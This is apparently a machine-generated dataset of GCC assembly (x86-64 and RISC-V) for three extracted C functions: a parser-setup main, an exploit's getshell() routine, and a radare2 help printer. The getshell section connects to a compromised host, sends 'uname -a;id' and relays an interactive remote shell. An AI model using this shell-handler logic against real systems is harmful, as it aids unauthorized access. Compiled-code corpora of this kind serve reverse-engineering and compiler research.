main: .LFB1: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 movl %edi, %r15d leaq .LC0(%rip), %rdi pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 movq %rsi, %r12 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 subq $200, %rsp .cfi_def_cfa_offset 256 movq %fs:40, %rax movq %rax, 184(%rsp) xorl %eax, %eax call mpc_new@PLT leaq .LC1(%rip), %rdi movq %rax, %r14 call mpc_new@PLT leaq .LC2(%rip), %rdi movq %rax, 8(%rsp) call mpc_new@PLT leaq .LC3(%rip), %rdi movq %rax, %r13 call mpc_new@PLT leaq .LC4(%rip), %rdi movq %rax, 16(%rsp) call mpc_new@PLT leaq .LC5(%rip), %rdi movq %rax, 24(%rsp) call mpc_new@PLT leaq .LC6(%rip), %rdi movq %rax, 32(%rsp) call mpc_new@PLT leaq .LC7(%rip), %rdi movq %rax, 40(%rsp) call mpc_new@PLT leaq .LC8(%rip), %rdi movq %rax, 48(%rsp) call mpc_new@PLT leaq .LC9(%rip), %rdi movq %rax, 56(%rsp) call mpc_new@PLT leaq .LC10(%rip), %rdi movq %rax, 64(%rsp) call mpc_new@PLT leaq .LC11(%rip), %rdi movq %rax, 72(%rsp) call mpc_new@PLT leaq .LC12(%rip), %rdi movq %rax, 80(%rsp) call mpc_new@PLT leaq .LC13(%rip), %rdi movq %rax, 88(%rsp) call mpc_new@PLT leaq .LC14(%rip), %rdi movq %rax, 96(%rsp) call mpc_new@PLT leaq .LC15(%rip), %rdi movq %rax, 104(%rsp) call mpc_new@PLT leaq .LC16(%rip), %rdi movq %rax, %rbp call mpc_new@PLT leaq .LC17(%rip), %rdi movq %rax, 152(%rsp) call mpc_new@PLT leaq .LC18(%rip), %rdi movq %rax, 112(%rsp) call mpc_new@PLT leaq .LC19(%rip), %rdi movq %rax, 120(%rsp) call mpc_new@PLT leaq .LC20(%rip), %rdi movq %rax, 128(%rsp) call mpc_new@PLT leaq .LC21(%rip), %rdi movq %rax, 144(%rsp) call mpc_new@PLT leaq .LC22(%rip), %rdi movq %rax, 136(%rsp) call mpc_new@PLT pushq $0 .cfi_def_cfa_offset 264 movq %r13, %r8 movq %r14, %rdx pushq %rax .cfi_def_cfa_offset 272 movq %rax, %rbx pushq 152(%rsp) .cfi_def_cfa_offset 280 movq 168(%rsp), %rsi pushq %rsi .cfi_def_cfa_offset 288 leaq .LC23(%rip), %rsi pushq 160(%rsp) .cfi_def_cfa_offset 296 pushq 160(%rsp) .cfi_def_cfa_offset 304 pushq 160(%rsp) .cfi_def_cfa_offset 312 movq 208(%rsp), %rcx pushq %rcx .cfi_def_cfa_offset 320 pushq %rbp .cfi_def_cfa_offset 328 pushq 176(%rsp) .cfi_def_cfa_offset 336 pushq 176(%rsp) .cfi_def_cfa_offset 344 pushq 176(%rsp) .cfi_def_cfa_offset 352 pushq 176(%rsp) .cfi_def_cfa_offset 360 pushq 176(%rsp) .cfi_def_cfa_offset 368 pushq 176(%rsp) .cfi_def_cfa_offset 376 pushq 176(%rsp) .cfi_def_cfa_offset 384 pushq 176(%rsp) .cfi_def_cfa_offset 392 pushq 176(%rsp) .cfi_def_cfa_offset 400 movl MPCA_LANG_DEFAULT(%rip), %edi pushq 176(%rsp) .cfi_def_cfa_offset 408 pushq 176(%rsp) .cfi_def_cfa_offset 416 movq 176(%rsp), %r9 movq 168(%rsp), %rcx call mpca_lang@PLT addq $160, %rsp .cfi_def_cfa_offset 256 testq %rax, %rax je .L2 movq %rax, %rdi movq %rax, 144(%rsp) call mpc_err_print@PLT movq 144(%rsp), %rdi call mpc_err_delete@PLT movl $1, %edi call exit@PLT .L2: testl %r15d, %r15d jle .L3 movq 8(%r12), %rdi leaq 160(%rsp), %rdx movq %rbx, %rsi call mpc_parse_contents@PLT testq %rax, %rax je .L9 movl stderr(%rip), %esi movq 168(%rsp), %rdi call mpc_ast_print_to@PLT movq 168(%rsp), %r15 cmpl $0, (%r15) jle .L5 xorl %ebp, %ebp .p2align 4,,10 .p2align 3 .L6: movq 16(%r15), %rax leaq .LC24(%rip), %rdi movq (%rax,%rbp,8), %r12 addq $1, %rbp movl 4(%r12), %edx movl 8(%r12), %esi call eprintf@PLT movq %r12, %rdi call processNode@PLT cmpl %ebp, (%r15) jg .L6 movq 168(%rsp), %r15 .L5: movq %r15, %rdi call mpc_ast_delete@PLT jmp .L8 .L9: movq 160(%rsp), %rdi call mpc_err_print@PLT movq 160(%rsp), %rdi call mpc_err_delete@PLT .L8: subq $8, %rsp .cfi_def_cfa_offset 264 movq %r13, %rcx movq %r14, %rsi movl $17, %edi pushq %rbx .cfi_def_cfa_offset 272 pushq 152(%rsp) .cfi_def_cfa_offset 280 pushq 152(%rsp) .cfi_def_cfa_offset 288 pushq 152(%rsp) .cfi_def_cfa_offset 296 pushq 152(%rsp) .cfi_def_cfa_offset 304 pushq 152(%rsp) .cfi_def_cfa_offset 312 pushq 152(%rsp) .cfi_def_cfa_offset 320 pushq 152(%rsp) .cfi_def_cfa_offset 328 pushq 152(%rsp) .cfi_def_cfa_offset 336 pushq 152(%rsp) .cfi_def_cfa_offset 344 pushq 152(%rsp) .cfi_def_cfa_offset 352 pushq 152(%rsp) .cfi_def_cfa_offset 360 pushq 152(%rsp) .cfi_def_cfa_offset 368 pushq 152(%rsp) .cfi_def_cfa_offset 376 pushq 152(%rsp) .cfi_def_cfa_offset 384 movq 152(%rsp), %r9 movq 144(%rsp), %r8 movq 136(%rsp), %rdx call mpc_cleanup@PLT movl $0, 288(%rsp) movl 288(%rsp), %eax subq $-128, %rsp .cfi_def_cfa_offset 256 cmpl $4, %eax jg .L11 .p2align 4,,10 .p2align 3 .L12: movl 160(%rsp), %eax addl $1, %eax movl %eax, 160(%rsp) movl 160(%rsp), %eax cmpl $4, %eax jle .L12 .L11: movq 184(%rsp), %rax subq %fs:40, %rax jne .L21 addq $200, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .L3: .cfi_restore_state movl stdin(%rip), %esi leaq 160(%rsp), %rcx movq %rbx, %rdx leaq .LC25(%rip), %rdi call mpc_parse_pipe@PLT testq %rax, %rax je .L9 movq 168(%rsp), %rdi call mpc_ast_print@PLT movq 168(%rsp), %rdi call mpc_ast_delete@PLT jmp .L8 .L21: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size main, .-main .globl stdin .bss .align 4 .type stdin, @object .size stdin, 4 stdin: .zero 4 .globl stderr .align 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .globl MPCA_LANG_DEFAULT .align 4 .type MPCA_LANG_DEFAULT, @object .size MPCA_LANG_DEFAULT, 4 MPCA_LANG_DEFAULT: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_rlcc.c_main_aug_v3_4.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "ident" .align 3 .LC1: .string "number" .align 3 .LC2: .string "character" .align 3 .LC3: .string "string" .align 3 .LC4: .string "factor" .align 3 .LC5: .string "term" .align 3 .LC6: .string "lexp" .align 3 .LC7: .string "stmt" .align 3 .LC8: .string "exp" .align 3 .LC9: .string "vartype" .align 3 .LC10: .string "typeident" .align 3 .LC11: .string "decls" .align 3 .LC12: .string "args" .align 3 .LC13: .string "body" .align 3 .LC14: .string "comment" .align 3 .LC15: .string "linecomment" .align 3 .LC16: .string "asm" .align 3 .LC17: .string "procedure" .align 3 .LC18: .string "cprocedure" .align 3 .LC19: .string "sigdef" .align 3 .LC20: .string "sigbody" .align 3 .LC21: .string "includes" .align 3 .LC22: .string "smallc" .align 3 .LC23: .ascii " ident : /[a-zA-Z_][a-zA-Z0-9_]*/ ; " .ascii " \n number : /[0-9]+/ ; " .ascii " \n character : /'.'/ ; " .ascii " \n string : /\"(\\\\.|[^\"])*\"/ ; " .ascii " \n " .ascii " \n factor : '(' <le" .ascii "xp> ')' \n |" .ascii " <number> \n " .ascii " | <character> " .ascii " \n | <string> " .ascii " \n | <ident> '(' <lexp>? (',' <lexp>)* '" .ascii ")' \n | <ident> ; " .ascii " \n " .ascii " \n term : <factor> ((" .ascii "'*' | '/' | '%') <factor>)* ; \n lexp : <te" .ascii "rm> (('+' | '-') <term>)* ; \n " .ascii " \n" .ascii " stmt : '{' <stmt>* '}' " .ascii " \n | \"while\" '(' <exp> ')' <stmt> " .ascii " \n | \"if\" '(' <exp> ')' <stmt> " .ascii " \n | <ident> '=' <lexp> ';' " .ascii " \n | \"print\" '(' <" .ascii "lexp>? ')' ';' \n | \"retur" .ascii "n\" <lexp>? ';' \n |" .ascii " <ident> '(' (<number>|<ident>|<string>)? (',' (<string>|<nu" .ascii "mber>|<ident>))* ')' ';' ; \n " .ascii " \n exp : <le" .ascii "xp> '>' <lexp> \n " .ascii " | <lexp> '<' <lexp> \n" .ascii " | <lexp> \">=\" <lexp> " .ascii " \n | <lexp> \"<=\" <lexp> " .ascii " \n | <lexp> \"!=\" <lexp> " .ascii " \n | <lexp> \"==\" <lexp> ; " .ascii " \n " .ascii " " .ascii " \n vartype : (\"int\" | \"char" .ascii "\") ; \n typeident : <vartype>" .ascii " <ident> ; \n decls : (" .ascii "<typeident> ';')* ; \n args " .ascii " : <typeident>? (',' <typeident>)* ; " .ascii "\n body : '{' <decls> <stmt>* '}' ; " .ascii " \n comment : /\\/\\*([^\\*])*\\*\\// ; " .ascii " \n linecomment : /\\/\\/([^\\n])*/ ; " .ascii " \n asm : /\\:([^\\n])*/ ; " .ascii " \n procedure : <ident> '@' \"glob" .ascii "al\" '(' <number>? ')' <body> ; \n cprocedure : <vartype> <i" .ascii "dent> '(' <args> ')' <body> ; \n sigdef : <ident> '@' <id" .ascii "ent> '(" .string "' <number> ')' ';' ; \n sigbody : '@' <ident> '(' <number> ')' ';' ; \n includes : (\"#include\" <string>)* ; \n smallc : /^/ (<comment>|<asm>|<linecomment>|<sigdef>|<sigbody>|<procedure>|<cprocedure>)* <includes> <decls> /$/ ; \n" .align 3 .LC24: .string "; TAG = %s (%s)\n" .align 3 .LC25: .string "<stdin>" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-416 la a4,__stack_chk_guard mv a5,a0 sd a5,240(sp) lla a0,.LC0 ld a5, 0(a4) sd a5, 296(sp) li a5, 0 sd ra,408(sp) sd a1,264(sp) sd s0,400(sp) sd s1,392(sp) sd s2,384(sp) sd s3,376(sp) sd s4,368(sp) sd s5,360(sp) sd s6,352(sp) sd s7,344(sp) sd s8,336(sp) sd s9,328(sp) sd s10,320(sp) sd s11,312(sp) call mpc_new@plt mv s1,a0 lla a0,.LC1 call mpc_new@plt mv s2,a0 lla a0,.LC2 call mpc_new@plt mv s3,a0 lla a0,.LC3 call mpc_new@plt mv s4,a0 lla a0,.LC4 call mpc_new@plt mv s5,a0 lla a0,.LC5 call mpc_new@plt mv s6,a0 lla a0,.LC6 call mpc_new@plt mv s7,a0 lla a0,.LC7 call mpc_new@plt mv a5,a0 lla a0,.LC8 sd a5,144(sp) call mpc_new@plt mv a5,a0 lla a0,.LC9 sd a5,152(sp) call mpc_new@plt mv a5,a0 lla a0,.LC10 sd a5,160(sp) call mpc_new@plt mv a5,a0 lla a0,.LC11 sd a5,168(sp) call mpc_new@plt mv a5,a0 lla a0,.LC12 sd a5,176(sp) call mpc_new@plt mv a5,a0 lla a0,.LC13 sd a5,184(sp) call mpc_new@plt mv a5,a0 lla a0,.LC14 sd a5,192(sp) call mpc_new@plt mv a5,a0 lla a0,.LC15 sd a5,200(sp) call mpc_new@plt mv a5,a0 lla a0,.LC16 sd a5,256(sp) call mpc_new@plt mv a4,a0 lla a0,.LC17 sd a4,248(sp) call mpc_new@plt mv a3,a0 lla a0,.LC18 sd a3,208(sp) call mpc_new@plt mv s8,a0 lla a0,.LC19 sd s8,216(sp) call mpc_new@plt mv s9,a0 lla a0,.LC20 sd s9,224(sp) call mpc_new@plt mv s8,a0 lla a0,.LC21 call mpc_new@plt mv s10,a0 lla a0,.LC22 sd s10,232(sp) call mpc_new@plt ld a4,216(sp) lla s11,.LANCHOR0 mv s0,a0 lw a0,0(s11) sd a4,96(sp) ld a4,208(sp) ld a5,256(sp) sd s7,0(sp) sd a4,88(sp) ld a4,248(sp) sd a5,72(sp) ld a5,144(sp) sd a4,80(sp) ld a4,200(sp) sd a5,8(sp) mv a7,s6 sd a4,64(sp) ld a4,192(sp) mv a6,s5 mv a5,s4 sd a4,56(sp) ld a4,184(sp) mv a3,s2 mv a2,s1 sd a4,48(sp) ld a4,176(sp) lla a1,.LC23 sd zero,136(sp) sd a4,40(sp) ld a4,168(sp) sd s0,128(sp) sd s10,120(sp) sd a4,32(sp) ld a4,160(sp) sd s8,112(sp) sd s9,104(sp) sd a4,24(sp) ld a4,152(sp) sd a4,16(sp) mv a4,s3 call mpca_lang@plt beq a0,zero,.L2 mv s8,a0 call mpc_err_print@plt mv a0,s8 call mpc_err_delete@plt li a0,1 call exit@plt .L2: ld a5,240(sp) ble a5,zero,.L3 ld a5,264(sp) addi a2,sp,280 mv a1,s0 ld a0,8(a5) call mpc_parse_contents@plt bne a0,zero,.L21 .L9: ld a0,280(sp) call mpc_err_print@plt ld a0,280(sp) call mpc_err_delete@plt .L8: ld a5,232(sp) mv a4,s4 mv a7,s7 sd a5,88(sp) ld a5,224(sp) mv a6,s6 mv a3,s3 sd a5,80(sp) ld a5,216(sp) mv a2,s2 mv a1,s1 sd a5,72(sp) ld a5,208(sp) li a0,17 sd s0,96(sp) sd a5,64(sp) ld a5,200(sp) sd a5,56(sp) ld a5,192(sp) sd a5,48(sp) ld a5,184(sp) sd a5,40(sp) ld a5,176(sp) sd a5,32(sp) ld a5,168(sp) sd a5,24(sp) ld a5,160(sp) sd a5,16(sp) ld a5,152(sp) sd a5,8(sp) ld a5,144(sp) sd a5,0(sp) mv a5,s5 call mpc_cleanup@plt sw zero,280(sp) lw a4,280(sp) li a5,4 bgt a4,a5,.L11 li a4,4 .L12: lw a5,280(sp) addiw a5,a5,1 sw a5,280(sp) lw a5,280(sp) ble a5,a4,.L12 .L11: la a5,__stack_chk_guard ld a4, 296(sp) ld a5, 0(a5) xor a5, a4, a5 li a4, 0 bne a5,zero,.L22 ld ra,408(sp) ld s0,400(sp) ld s1,392(sp) ld s2,384(sp) ld s3,376(sp) ld s4,368(sp) ld s5,360(sp) ld s6,352(sp) ld s7,344(sp) ld s8,336(sp) ld s9,328(sp) ld s10,320(sp) ld s11,312(sp) li a0,0 addi sp,sp,416 jr ra .L21: lw a1,4(s11) ld a0,288(sp) call mpc_ast_print_to@plt ld s8,288(sp) lw a5,0(s8) ble a5,zero,.L5 li s9,0 lla s11,.LC24 .L6: ld a4,16(s8) slli a2,s9,3 mv a0,s11 add a4,a4,a2 ld s10,0(a4) addi s9,s9,1 lw a2,4(s10) lw a1,8(s10) call eprintf@plt mv a0,s10 call processNode@plt lw a2,0(s8) sext.w a4,s9 bgt a2,a4,.L6 ld s8,288(sp) .L5: mv a0,s8 call mpc_ast_delete@plt j .L8 .L3: lw a1,8(s11) addi a3,sp,280 mv a2,s0 lla a0,.LC25 call mpc_parse_pipe@plt beq a0,zero,.L9 ld a0,288(sp) call mpc_ast_print@plt ld a0,288(sp) call mpc_ast_delete@plt j .L8 .L22: call __stack_chk_fail@plt .size main, .-main .globl stdin .globl stderr .globl MPCA_LANG_DEFAULT .bss .align 2 .set .LANCHOR0,. + 0 .type MPCA_LANG_DEFAULT, @object .size MPCA_LANG_DEFAULT, 4 MPCA_LANG_DEFAULT: .zero 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .type stdin, @object .size stdin, 4 stdin: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_21784.c_getshell_aug_v3_6
.file "extr_21784.c_getshell_aug_v3_6.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "[*] checking to see if the exploit was successful." .section .rodata.str1.1,"aMS",@progbits,1 .LC1: .string "getshell(): socket() failed." .LC2: .string "getshell(): couldn't resolve." .section .rodata.str1.8 .align 8 .LC3: .string "[*] attempting to connect: %s:%d.\n" .align 8 .LC4: .string "[!] connection failed: %s:%d.\n" .align 8 .LC5: .string "[*] successfully connected: %s:%d.\n\n" .section .rodata.str1.1 .LC6: .string "uname -a;id\n" .LC7: .string "getshell(): select() failed." .LC8: .string "getshell(): read() failed." .LC9: .string "getshell(): write() failed." .text .p2align 4 .globl getshell .type getshell, @function getshell: .LFB1: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 subq $4096, %rsp .cfi_def_cfa_offset 4152 orq $0, (%rsp) subq $56, %rsp .cfi_def_cfa_offset 4208 movq %fs:40, %rax movq %rax, 4136(%rsp) xorl %eax, %eax movq %rdi, %r13 leaq .LC0(%rip), %rdi movl %esi, %r12d call puts@PLT movl IPPROTO_TCP(%rip), %edx movl SOCK_STREAM(%rip), %esi movl AF_INET(%rip), %edi call socket@PLT movl %eax, %ebp cmpl $-1, %eax je .L23 .L2: movl AF_INET(%rip), %eax movq %r13, %rdi movl %eax, 28(%rsp) call inet_addr@PLT movl %eax, 24(%rsp) testl %eax, %eax jne .L24 .L3: movzwl %r12w, %r12d movl %r12d, %edi call htons@PLT movl sig_alarm(%rip), %esi movl SIGALRM(%rip), %edi movl %eax, 20(%rsp) call signal@PLT movl TIMEOUT(%rip), %edi call alarm@PLT movl %r12d, %edx movq %r13, %rsi xorl %eax, %eax leaq .LC3(%rip), %rdi call printf@PLT leaq 20(%rsp), %rsi movl $12, %edx movl %ebp, %edi call connect@PLT testq %rax, %rax jne .L25 xorl %edi, %edi leaq 16(%rsp), %rbx leaq .LC7(%rip), %r14 call alarm@PLT movl %r12d, %edx movq %r13, %rsi xorl %eax, %eax leaq .LC5(%rip), %rdi leal 1(%rbp), %r12d call printf@PLT movl SIG_IGN(%rip), %esi movl SIGINT(%rip), %edi leaq 32(%rsp), %r13 call signal@PLT movl $13, %edx leaq .LC6(%rip), %rsi movl %ebp, %edi call write@PLT jmp .L11 .p2align 4,,10 .p2align 3 .L8: movq %rbx, %rsi movl %ebp, %edi call FD_ISSET@PLT testq %rax, %rax jne .L26 .L11: movq %rbx, %rdi call FD_ZERO@PLT xorl %edi, %edi movq %rbx, %rsi call FD_SET@PLT movq %rbx, %rsi movl %ebp, %edi call FD_SET@PLT xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %r12d, %edi call select@PLT testl %eax, %eax jle .L27 .L6: xorl %edi, %edi movq %rbx, %rsi call FD_ISSET@PLT testq %rax, %rax je .L8 movl $4096, %edx movq %r13, %rsi xorl %edi, %edi call read@PLT movl %eax, %r15d testl %eax, %eax jle .L28 .L9: movl %r15d, %edx movq %r13, %rsi movl %ebp, %edi call write@PLT cmpl %r15d, %eax je .L8 movl $1, %esi leaq .LC9(%rip), %rdi call printe@PLT movq %rbx, %rsi movl %ebp, %edi call FD_ISSET@PLT testq %rax, %rax je .L11 .p2align 4,,10 .p2align 3 .L26: movl $4096, %edx movq %r13, %rsi movl %ebp, %edi call read@PLT movl %eax, %edx testl %eax, %eax jg .L12 xorl %edi, %edi movl %eax, 12(%rsp) call exit@PLT movl 12(%rsp), %edx .L12: movq %r13, %rsi movl $1, %edi call write@PLT jmp .L11 .p2align 4,,10 .p2align 3 .L27: movl $1, %esi movq %r14, %rdi call printe@PLT jmp .L6 .p2align 4,,10 .p2align 3 .L28: movl $1, %esi leaq .LC8(%rip), %rdi call printe@PLT jmp .L9 .L25: xorl %eax, %eax movl %r12d, %edx leaq .LC4(%rip), %rdi movq %r13, %rsi call printf@PLT movq 4136(%rsp), %rax subq %fs:40, %rax jne .L29 addq $4152, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .L24: .cfi_restore_state movq %r13, %rdi call gethostbyname@PLT movq %rax, %rbx testq %rax, %rax je .L30 .L4: movq (%rbx), %rsi leaq 24(%rsp), %rdi movl $4, %edx call memcpy@PLT jmp .L3 .L23: movl $1, %esi leaq .LC1(%rip), %rdi call printe@PLT jmp .L2 .L30: movl $1, %esi leaq .LC2(%rip), %rdi call printe@PLT jmp .L4 .L29: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size getshell, .-getshell .globl sig_alarm .bss .align 4 .type sig_alarm, @object .size sig_alarm, 4 sig_alarm: .zero 4 .globl TIMEOUT .align 4 .type TIMEOUT, @object .size TIMEOUT, 4 TIMEOUT: .zero 4 .globl SOCK_STREAM .align 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .globl SIG_IGN .align 4 .type SIG_IGN, @object .size SIG_IGN, 4 SIG_IGN: .zero 4 .globl SIGINT .align 4 .type SIGINT, @object .size SIGINT, 4 SIGINT: .zero 4 .globl SIGALRM .align 4 .type SIGALRM, @object .size SIGALRM, 4 SIGALRM: .zero 4 .globl IPPROTO_TCP .align 4 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .globl AF_INET .align 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_21784.c_getshell_aug_v3_6.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[*] checking to see if the exploit was successful." .align 3 .LC1: .string "getshell(): socket() failed." .align 3 .LC2: .string "getshell(): couldn't resolve." .align 3 .LC3: .string "[*] attempting to connect: %s:%d.\n" .align 3 .LC4: .string "[!] connection failed: %s:%d.\n" .align 3 .LC5: .string "[*] successfully connected: %s:%d.\n\n" .align 3 .LC6: .string "uname -a;id\n" .align 3 .LC7: .string "getshell(): select() failed." .align 3 .LC8: .string "getshell(): read() failed." .align 3 .LC9: .string "getshell(): write() failed." .text .align 1 .globl getshell .type getshell, @function getshell: addi sp,sp,-128 li t0,-4096 li a5,4096 sd ra,120(sp) sd s0,112(sp) sd s1,104(sp) sd s3,88(sp) sd s4,80(sp) sd s5,72(sp) sd s2,96(sp) sd s6,64(sp) sd s7,56(sp) addi a4,a5,40 add sp,sp,t0 add a4,a4,sp la s5,__stack_chk_guard ld a5, 0(s5) sd a5, 0(a4) li a5, 0 mv s4,a0 lla a0,.LC0 lla s0,.LANCHOR0 mv s3,a1 call puts@plt lw a2,0(s0) lw a1,4(s0) lw a0,8(s0) call socket@plt li a5,-1 mv s1,a0 beq a0,a5,.L23 .L2: li a4,4096 lw a5,8(s0) li s2,-4096 addi a4,a4,48 add a4,a4,s2 add s2,a4,sp mv a0,s4 sw a5,-24(s2) call inet_addr@plt sw a0,-28(s2) bne a0,zero,.L24 .L3: mv a0,s3 call htons@plt li s6,4096 mv a4,a0 lw a1,12(s0) li s2,-4096 lw a0,16(s0) addi a5,s6,48 add a5,a5,s2 add a5,a5,sp sw a4,-32(a5) call signal@plt lw a0,20(s0) sext.w s3,s3 call alarm@plt mv a2,s3 mv a1,s4 lla a0,.LC3 call printf@plt addi a1,s2,-32 addi a5,s6,48 add a5,a5,a1 li a2,12 add a1,a5,sp mv a0,s1 call connect@plt bne a0,zero,.L25 call alarm@plt mv a2,s3 mv a1,s4 lla a0,.LC5 call printf@plt lw a1,24(s0) lw a0,28(s0) addi s0,s2,-36 addi s2,s2,-16 call signal@plt li a2,13 lla a1,.LC6 mv a0,s1 call write@plt li a4,4096 addi a5,a4,48 add a5,a5,s0 add s0,a5,sp addi a5,a4,48 add a5,a5,s2 addiw s3,s1,1 lla s6,.LC7 add s4,a5,sp .L13: lla s5,.LC9 lla s7,.LC8 j .L11 .L8: mv a1,s0 mv a0,s1 call FD_ISSET@plt bne a0,zero,.L26 .L11: mv a0,s0 call FD_ZERO@plt mv a1,s0 li a0,0 call FD_SET@plt mv a1,s0 mv a0,s1 call FD_SET@plt li a4,0 li a3,0 li a2,0 mv a1,s0 mv a0,s3 call select@plt ble a0,zero,.L27 .L6: mv a1,s0 li a0,0 call FD_ISSET@plt beq a0,zero,.L8 li a2,4096 mv a1,s4 li a0,0 call read@plt mv s2,a0 ble a0,zero,.L28 .L9: mv a2,s2 mv a1,s4 mv a0,s1 call write@plt beq a0,s2,.L8 li a1,1 mv a0,s5 call printe@plt mv a1,s0 mv a0,s1 call FD_ISSET@plt beq a0,zero,.L11 .L26: li a2,4096 mv a1,s4 mv a0,s1 call read@plt mv s2,a0 bgt a0,zero,.L12 li a0,0 call exit@plt .L12: mv a2,s2 mv a1,s4 li a0,1 call write@plt j .L13 .L27: li a1,1 mv a0,s6 call printe@plt j .L6 .L28: li a1,1 mv a0,s7 call printe@plt j .L9 .L25: mv a2,s3 mv a1,s4 lla a0,.LC4 call printf@plt li a5,4096 addi a5,a5,40 add a5,a5,sp ld a4, 0(a5) ld a5, 0(s5) xor a5, a4, a5 li a4, 0 bne a5,zero,.L29 li t0,4096 add sp,sp,t0 ld ra,120(sp) ld s0,112(sp) ld s1,104(sp) ld s2,96(sp) ld s3,88(sp) ld s4,80(sp) ld s5,72(sp) ld s6,64(sp) ld s7,56(sp) addi sp,sp,128 jr ra .L24: mv a0,s4 call gethostbyname@plt mv s2,a0 beq a0,zero,.L30 .L4: li a5,4096 li a0,-4096 addi a5,a5,48 add a5,a5,a0 ld a1,0(s2) add a0,a5,sp li a2,4 addi a0,a0,-28 call memcpy@plt j .L3 .L23: li a1,1 lla a0,.LC1 call printe@plt j .L2 .L30: li a1,1 lla a0,.LC2 call printe@plt j .L4 .L29: call __stack_chk_fail@plt .size getshell, .-getshell .globl sig_alarm .globl TIMEOUT .globl SOCK_STREAM .globl SIG_IGN .globl SIGINT .globl SIGALRM .globl IPPROTO_TCP .globl AF_INET .bss .align 2 .set .LANCHOR0,. + 0 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .type sig_alarm, @object .size sig_alarm, 4 sig_alarm: .zero 4 .type SIGALRM, @object .size SIGALRM, 4 SIGALRM: .zero 4 .type TIMEOUT, @object .size TIMEOUT, 4 TIMEOUT: .zero 4 .type SIG_IGN, @object .size SIG_IGN, 4 SIG_IGN: .zero 4 .type SIGINT, @object .size SIGINT, 4 SIGINT: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_core_java.c_r_cmd_java_print_cmd_help_aug_v3_7
.file "extr_core_java.c_r_cmd_java_print_cmd_help_aug_v3_7.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "[*] %s %s\n[+] %s\n\n" .text .p2align 4 .type r_cmd_java_print_cmd_help, @function r_cmd_java_print_cmd_help: .LFB24: .cfi_startproc endbr64 movl 4(%rdi), %edx movl 8(%rdi), %esi movl (%rdi), %ecx leaq .LC0(%rip), %rdi jmp eprintf@PLT .cfi_endproc .LFE24: .size r_cmd_java_print_cmd_help, .-r_cmd_java_print_cmd_help .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_core_java.c_r_cmd_java_print_cmd_help_aug_v3_7.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[*] %s %s\n[+] %s\n\n" .text .align 1 .type r_cmd_java_print_cmd_help, @function r_cmd_java_print_cmd_help: lw a3,0(a0) lw a2,4(a0) lw a1,8(a0) lla a0,.LC0 tail eprintf@plt .size r_cmd_java_print_cmd_help, .-r_cmd_java_print_cmd_help .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
